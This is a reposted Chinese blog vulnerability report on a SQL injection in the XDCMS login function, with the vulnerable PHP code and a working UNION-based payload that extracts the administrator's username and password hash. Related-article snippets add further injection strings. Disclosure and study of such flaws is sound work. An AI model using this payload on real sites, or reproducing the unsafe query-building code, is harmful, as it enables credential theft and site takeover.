mysql注入 xfkxfk_XDCMS企业管理系统SQL注入#2

于 2021-01-28 05:07:59 发布
阅读量327 收藏
点赞数
文章标签: mysql注入 xfkxfk
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32419609/article/details/113460571
版权
本文详细探讨了XDCMS企业管理系统中的SQL注入漏洞,该漏洞源于登录功能中对用户输入过滤不足,允许攻击者通过构造特定输入绕过限制,执行恶意SQL语句。通过提供具体的注入 payload 示例,作者证明了该漏洞的存在,并展示了如何获取管理员的用户名和密码。
摘要由CSDN通过智能技术生成

### 简要描述:

最新版XDCMS企业管理系统,由于过滤不严,可绕过限制,导致SQL注入

### 详细说明:

注入在XDCMS企业管理系统的登录功能处,来看看\system\modules\member\index.php文件: 登录时会调用login_save进行登录验证,问题就出在index.php的login_save函数处:

```

public function login_save(){

$username = safe_html($_POST['username']);//获取UserName,通过safe_html进行过滤,这里存在缺陷,可绕过限制,进行注入

$password = safe_html($_POST['password']);

if(empty($username)||empty($password)){

showmsg(C('user_pass_empty'),'-1');

}

$sql="select * from ".DB_PRE."member where `username`='$username'";//通过绕过限制,在这里进行注入

if($this->mysql->num_rows($sql)==0){

showmsg(C('member_not_exist'),'-1');

}

$password=md5(md5($password));

$rs=$this->mysql->get_one($sql);

if($password!=$rs['password']){

showmsg(C('password_error'),'-1');

}

if($rs['is_lock']==1){

showmsg(C('user_lock'),'-1');

}

$logins=$rs["logins"]+1;

$ip=safe_replace(safe_html(getip()));

$this->mysql->db_update("member","`last_ip`='".$ip."',`last_time`=".datetime().",`logins`=".$logins,"`username`='$username'");

Cookie::_setcookie(array('name'=>'member_user','value'=>$username));

Cookie::_setcookie(array('name'=>'member_userid','value'=>$rs['userid']));

Cookie::_setcookie(array('name'=>'member_groupid','value'=>$rs['groupid']));

unset($rs);

showmsg(C("login_success"),"index.php?m=member");

}

```

### 漏洞证明:

由于在获取UserName时,通过safe_html进行过滤,safe_html只是按照小写过滤了常规的SQL注入敏感词以及=和*,但只这里存在缺陷,可绕过限制,进行注入。

我们使用小写SQL语句,并且不实用=和*

在登录是,抓包,在UserName的值后面增加一下内容:

```

' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(username,0x23,password) FROM c_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b#

```

即可注入出管理员的用户名密码

[dl1.png](https://images.seebug.org/upload/201311/30203655fffe86ba1742808a51deb67a6a0ac06b.png)

[dl2.png](https://images.seebug.org/upload/201311/302037083fd57d1094784b045edc02e7951edc89.png)

loading-bars.svg

四月十一日
关注
〖Python 数据库开发实战 - Python与MySQL交互篇②〗- SQL 注入攻击案例
易编橙 · 终身成长社群,相遇已是上上签!
08-22 4万+
上一章节,我们只是简单的了解了 MySQL Connector 的语法,完成了一个简单的案例。Python 语言操作数据库不是到这里就结束了后续还有很多高级的内容等着我们去学习,该章节我们就来学习一下对所有数据库都有效的 "SQL 注入攻击" 。
sql注入获取mysql版本信息_这可能是最全的SQL注入总结,很有用
weixin_28936857的博客
02-22 2479
SQL注入原理当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。攻击者通过构造不同的sql语句来实现对数据库的任意操作。SQL注入的分类按变量类型分:数字型和字符型按HTTP提交方式分:POST注入、GET注入和Cookie注入注入方式分:布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入按数据库类型分:sql:oracle、MySQL、mssql、access、sq...
XDcms多语言企业网站管理系统 3.0.1
10-26
XDcms是南宁旭东网络科技有限公司推出的一套开源的通用的内容管理系统。主要使用php+mysql+smarty技术基础进行开发,XDcms采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,二次开发能力优秀。 XDcms多语言企业网站管理系统 3.0.1 升级内容:2013-09-16 1、增加幻灯片分类 2、修复单页模块修改内容不能保存 3、修复编辑器上传图片出错
PHP代码审计 17 实战 Xdcms 漏洞挖掘 SQL 注入
kevinhanser
07-23 1986
本文记录 PHP 代码审计的学习过程,教程为暗月 2015 版的 PHP 代码审计课程 PHP 代码审计博客目录 1. 简介 思路 查看网站后台管理页面的源码,查看网站使用了那些过滤函数(通常会有一些自定义的过滤函数可供调用) 通常情况下 GETGET_GET、_POST 都是用了过滤函数之后才会和数据库进行连接,如果发现未使用过滤函数,那么说明存在漏洞。 在页面 ...
xdcms SQL注入漏洞
m0_51775169的博客
11-16 1613
xdcms SQL注入漏洞 实验目的:获取目标网站目录信息 实验工具BURP SQLMap 中国菜刀 操作机windows XP 目标网站www.test.ichunqiu 第一步获取网站管理员账号密码。 打开浏览器输入网址www.test.ichunqiu 进入注册页面 填写好注册信息别动!打开工具burpLoader.jar 回到浏览器,设置局域网本地代理,依次点击 设置 -> 更改代理服务器设置 -> 连接 -> 局域网设置,在 为 LAN 使用代理服务器 前打钩,在地址上填 127
mysql注入 xfkxfk_MySQL数据库手工注入技巧
weixin_34683262的博客
01-19 121
MySQL数据库手工注入技巧MySQL数据库的注入很复杂、很精彩,完全是Access不能比的。因为MySQL注入很灵活了,完全不像Access那样死板固定,我感觉Access的注入完全是靠人品,或者可以说,谁的表名、列名字典大,谁的成功率就大。根据我对MySQL的认识,注入时,基本可以通过爆、盲注、报错三种方式获得用户名和密码,在权限足够的情况下,还可以直接通过SQL语句插入并导出我们的一句话w...
mysql注入 xfkxfk_PHPSHE SQL注入2(全版通杀)
weixin_39612896的博客
01-19 113
### 简要描述:PHPSHE SQL注入,全版本通杀。### 详细说明:在/module/index/product.php文件在商品咨询,和商品评价时未对参数请求头部信息过滤,导致sql注入。看看商品评价的代码:```//#####################@ 商品评价 @#####################//case 'commentadd':if (isset($_p_pes...
PHP+MysqlSQL注入源码 下载
01-01
MySQL则是一款关系型数据库管理系统,因其高效、稳定和开源而受到开发者喜爱。在PHP中连接和操作MySQL数据库,通常会使用mysqli或PDO(PHP Data Objects)扩展。这两个扩展都支持预处理语句,这是防止SQL注入的有效...
mysql中like语句注入_like查询中的SQL注入
weixin_39643865的博客
01-19 4076
list = schoolDao.getSchoolByName("长乐一中%' or '1%' = '1");for(School school : list){System.out.println(school.getName());}}catch(Exception e){e.printStackTrace();}}用p6spy查看最后生成的sql语句:Sql代码sql1:select *...
如何检测mysql注入漏洞_SQL注入漏洞检测
weixin_32027887的博客
01-27 3860
一个度过菜鸟期的后台程序员都会小心的避开SQL注入常见低级错误。除了白盒和代码评审,作为第三方的渗透测试,使用sqlmap这样的常用工具进行SQL注入扫描可以降低上述问题发生概率。工具环境准备0.先检查一下是否安装过sqlmap工具,显示下版本sqlmap --version如果运行成功说明已经安装此工具,比如返回1.1.6#pip如果没有安装过sqlmap,请参考后面两个步骤1.安装pip工具多...
XDcms多语言企业网站管理系统 3.0.1.rar
05-27
XDcms是南宁旭东网络科技有限公司推出的一套开源的通用的内容管理系统。主要使用php mysql smarty技术基础进行开发,XDcms采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,二次开发能力优秀。 XDcms多语言企业网站管理系统 3.0.1 升级内容:2013-09-16 1、增加幻灯片分类 2、修复单页模块修改内容不能保存 3、修复编辑器上传图片出错 4、修复留言模块不能调用系统设置 环境需求: 1. 可用的 www 服务器,如 Apache、Zeus、IIS 等 2. php 5.0 及以上 3. MySQL 5 及以上,仅针对 MySQL 版 重点功能: A、内容管理模型,自定义字段,更方便扩展功能。自带模型:单页模型、新闻模型、产品模型、招聘模型 B、栏目自定义,便于内容管理 C、内容模块化,二次开发更便捷。自带模块:幻灯片、QQ客服、友情链接、自定义表单(在线留言、简历管理) D、模板管理,后台编辑模板更方便 E、邮件发送,表单留言自动发送邮件到邮箱 F、数据缓存,访问速度更快 G、会员自定义模型、字段 H、结合Smarty开发的万能loop标签,数据调用更简单、更方便 I、产品多图多方位展示
XDcms旭东php企业网站管理系统v3.0.1utf8多语言版
07-24
XDcms是南宁旭东网络科技有限公司推出的一套完全开源的通用的内容管理系统。主要使用php mysql smarty技术基础进行开发,XDcms采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,二次开发能力优秀。 XDcms重点功能 A、内容管理模型,自定义字段,更方便扩展功能。自带模型:单页模型、新闻模型、产品模型、招聘模型 B、栏目自定
旭东多语言企业网站管理系统XDcms v3.0.1.rar
08-30
XDcms是南宁旭东网络科技有限公司推出的一套完全开源的通用的内容管理系统。主要使用php mysql smarty技术基础进行开发,XDcms采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,二次开发能力优秀。 XDcms重点功能 A、内容管理模型,自定义字段,更方便扩展功能。自带模型:单页模型、新闻模型、产品模型、招聘模型 B、栏目自定义,便于内容管理 C、内容模块化,二次开发更便捷。自带模块:幻灯片、QQ客服、友情链接、自定义表单(在线留言、简历管理) D、模板管理,后台编辑模板更方便 E、邮件发送,表单留言自动发送邮件到邮箱 F、数据缓存,访问速度更快 G、会员自定义模型、字段 H、结合Smarty开发的万能loop标签、get_block碎片标签,数据调用更简单、更方便 I、产品多图多方位展示 J、URL规则自定义,更有利于做搜索引擎优化 K、自定义语言类别,可添加多种语言
XDcmsphp企业网站内容管理系统v2.0.8gbk
08-08
XDcms是南宁旭东网络科技有限公司推出的一套完全开源的通用的内容管理系统。主要使用php mysql smarty技术基础进行开发,XDcms采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,二次开发能力优秀。 XDcms重点功能 A、内容管理模型,自定义字段,更方便扩展功能。自带模型:单页模型、新闻模型、产品模型、招聘模型 B、栏目自定
旭东多语言企业网站管理系统XDcms v3.0
04-02
这是i一款旭东多语言企业网站管理系统XDcms v3.0,该源码XDcms是南宁旭东网络科技有限公司推出的一套完全开源的通用的内容管理系统。主要使用php+mysql+smarty技术基础进行开发,XDcms采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,二次开发能力优秀。 XDcms重点功能 A、内容管理模型,自定义字段,更方便扩展功能。自带模型:单页模型、新闻模型、产品模型、招聘模型 B、栏目自定义,便于内容管理 C、内容模块化,二次开发更便捷。自带模块:幻灯片、QQ客服、友情链接、自定义表单(在线留言、简历管理) D、模板管理,后台编辑模板更方便 E、邮件发送,表单留言自动发送邮件到邮箱 F、数据缓存,访问速度更快 G、会员自定义模型、字段 H、结合Smarty开发的万能loop标签、get_block碎片标签,数据调用更简单、更方便 I、产品多图多方位展示 J、URL规则自定义,更有利于做搜索引擎优化 K、自定义语言类别,可添加多种语言
mysql注入 xfkxfk_WSS最新版多处SQL注入直接获取数据三(官方demo演示及快速定位漏洞技巧)...
weixin_32073865的博客
01-28 220
### 简要描述:WSS最新版多处SQL注入直接获取数据三,官方demo演示,这里存在多处,对同一问题进行总结### 详细说明:WSS最新版1.3.2,这里存在多处,并对此同一问题进行总结,以及快速查找同一问题全部漏洞```这里的漏洞没有任何权限限制,任何用户都能进行注入```漏洞分析:[WooYun: WSS最新版某处SQL注入直接获取数据二(两处)](http://www.wooyun.org...
php审计学习:xdcms2.0.8注入
weixin_30493401的博客
07-14 151
注入点Fields: 注册页面会引用如下方法: $fields 变量是从 $fields=$_POST['fields']; 这里获取, 在代码里没有过滤。 打印 fields 数据查看: 从代码上看 $field_sql.=",`{$k}`='{$f_value}'"; 最终会变成: ,`truename`='111111',`email`='...
XDcms订餐网站管理系统v1.0代码审计
xxxMIng的博客
12-28 1248
实例分析讲解为您敲开代码审计大门 分析目标 XDcms订餐网站系统 v1.0 XDcms订餐网站管理系统,主要使用Php+Mysql+Smarty技术基础进行开发,采用OOP(面向对象)方式进行基础运行框架搭建,集成在线订餐、团购、积分商城、优惠券、新闻、在线订单、在线支付、生成订单短信/邮箱通知、点评、Google电子地图、问答、并与支付宝、Dz论坛、短信平台接口完美整...
XDcms强大的php开源CMS系统
02-01
一款强大的开源资料,由php编写的内容管理系统,功能强大,稳定性好,扩展性强
MySQL SQL注入:information_schema数据库的利用与解析
"本文深入探讨了information_schema数据库在SQL注入攻击中的应用,特别是在MySQL环境下的重要性。这个系统数据库包含了MySQL服务器内所有数据库、表和列的详细信息,为攻击者提供了一个宝贵的工具来获取和利用数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值